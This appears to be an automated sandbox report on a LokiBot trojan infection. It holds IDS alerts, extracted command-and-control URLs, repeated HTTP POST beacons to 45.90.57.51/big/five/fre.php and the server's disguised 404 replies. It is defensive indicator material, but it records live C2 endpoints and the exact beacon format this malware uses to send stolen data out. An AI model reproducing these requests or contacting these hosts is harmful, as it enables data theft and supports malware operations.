                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49773 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49773
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49774 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49774
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49775 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49775
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Malware configuration extractorURLs: 45.90.57.51/big/five/fre.php
                  Source: Joe Sandbox ViewASN Name: GREENFLOID-ASUA GREENFLOID-ASUA
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
                  Source: unknownHTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
